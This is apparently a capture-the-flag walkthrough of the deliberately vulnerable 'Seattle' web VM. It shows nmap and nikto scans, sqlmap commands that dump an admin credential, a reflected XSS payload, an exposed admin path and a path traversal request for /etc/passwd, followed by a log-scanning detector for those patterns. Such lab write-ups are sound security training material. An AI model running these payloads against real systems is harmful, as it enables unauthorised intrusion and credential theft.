Seattle: v0.3

Description

Graceful’s VulnVM is a web application running on a virtual machine. It’s designed to simulate a simple eCommerce style website which is purposely vulnerable to a number of well-known security issues commonly seen in web applications. This is really a pre-release preview of the project but it’s certainly functional as it stands, but I’m planning on doing a lot of work on this in the near future.

The plan is ultimately to have the application vulnerable to a large number of issues with a selection of different filters at different difficulties; that way, as testers become better at detecting and exploiting issues, the application can get hardened against common exploitation methods to allow the testers a wider range of experiences.

Enumeration

nmap -p- -sV 192.168.2.17

 

Looks like the machine runs a web server.

nikto -h http://192.168.2.17

Let’s see what OWASP Zed Attack Proxy (ZAP) finds.

So ZAP reports a SQL injection and an XSS vulnerability. Let’s go for the SQL injection first.

SQL Injection

Let’s capture the GET request, load it into sqlmap and find out the name of the database.

sqlmap -r ~/Desktop/header.txt --level=5 --risk=3 --current-db

So, the name of the database is ‘seattle’. Let’s get the rest of the information.

sqlmap -r ~/Desktop/header.txt --level=5 --risk=3 -D seattle --tables

sqlmap -r ~/Desktop/header.txt --level=5 --risk=3 -D seattle -T tblMembers --columns --dump

That’s nice. The username plus password of the admin.
admin@seattlesounds.net | Assasin1
Let’s log in as admin.

Unfortunately there is no way to upload a dirty PHP file to get a reverse shell.
But let’s look at some other vulnerabilities.

Cross Site Scripting

After looking at some pages, it seems one of them is vulnerable to XSS.

http://192.168.2.17/blog.php?author="><script>alert('Yes! XSS')%3B<%2Fscript>

Disclosure of information

http://192.168.2.17/admin/

Path traversal

192.168.2.17/download.php?item=../../../../etc/passwd
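
The XSS and path traversal requests above, seen from the defender's side: this added example (not part of the original write-up or of the VulnVM project) scans web access-log lines for those two patterns in query parameters. The log lines, client IP, timestamps and the file name Brochure.pdf are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '192.168.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /blog.php?author=3 HTTP/1.1" 200 5120',
    '192.168.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /blog.php?author=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5301',
    '192.168.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /download.php?item=../../../../etc/passwd HTTP/1.1" 200 1432',
    '192.168.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /download.php?item=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
    '192.168.2.10 - - [01/Jan/2024:10:00:15 +0000] "GET /download.php?item=Brochure.pdf HTTP/1.1" 200 88211',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3})')
RULES = {
    "path-traversal": re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)'),
    "xss-markup": re.compile(r'<\s*/?\s*script\b|\bon[a-z]+\s*=', re.I),
}

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return sorted (rule, parameter, status) findings; a 2xx status deserves triage first."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target, status = m.group(1), int(m.group(2))
    findings = set()
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)  # parse_qsl has already decoded one layer
        for rule, pattern in RULES.items():
            if pattern.search(value):
                findings.add((rule, name, status))
    return sorted(findings)

def scan(lines):
    """Map line index -> findings, skipping clean lines."""
    results = {}
    for i, line in enumerate(lines):
        hits = scan_line(line)
        if hits:
            results[i] = hits
    return results
```

Matching runs on the decoded parameter value, so the double-encoded variant in the fourth sample line is caught as well as the plain request shown above.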

Fun VM but too bad there wasn’t the possibility for a reverse shell.
